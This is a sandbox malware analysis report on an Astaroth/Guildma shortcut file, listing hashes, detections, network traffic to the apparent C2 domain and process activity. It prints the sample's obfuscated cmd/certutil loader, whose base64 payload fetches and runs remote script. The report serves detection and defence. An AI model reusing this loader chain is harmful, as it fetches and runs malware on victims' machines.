Windows Analysis Report
uk231b27we.lnk

Overview

General Information

Sample Name: uk231b27we.lnk
Analysis ID: 795686
MD5: 992f5faaef370f7963b09123eaee18dd
SHA1: cf99a5906e22105ade1f367f0c289fafa9952a1c
SHA256: d7ddebfa36f629e5ef41b692140e2c06f23b5c8017040215eaf0247a7db3b2f7
Tags: Astaroth, BRA, geo, Guildma, lnk

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2

Networking

Source: C:\Windows\System32\wscript.exe Domain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.221.22 80
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.124.96 443
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.3:49681 -> 172.67.221.22:80
Source: global traffic HTTP traffic detected:
  GET /cdn-cgi/error HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Connection: Keep-Alive
  Host: www.cloudflare.com
Source: global traffic HTTP traffic detected:
  GET /?3/ HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: gwae8.industryinfluence.shop
  Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 104.16.124.96
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 01 Feb 2023 06:46:05 GMT
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: MISS
  Set-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
  Server-Timing: cf-q-config;dur=6.0000002122251e-06
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnly
  Server: cloudflare
  CF-RAY: 7928ba5a6cd990ee-FRA
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.257885861.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251546620.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258534912.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251838024.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.252114824.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/b
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error&
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error(
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error2.L
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ.4
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/~
Source: unknown DNS traffic detected: queries for: gwae8.industryinfluence.shop
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Domain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.221.22 80
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.124.96 443
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\qxdhvbd\>nul 2>&1 &&s^et xecy=c:\qxdhvbd\^qxdhvbd.^js&&echo dmfyiemxoha9innjiisicii7rde4cd0iaxaikyj0omgio0uxoha9ilqikyj0ucirijoio0dlde9iamvjdchdmthwk0qxoharrte4ccsily9nd2floc5pbmr1c3ryewluzmx1zw5jzs5zag9wlz8zlyipow==>!xecy!&&certutil -f -deco^de !xecy! !xecy!&&ca^ll !xecy!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid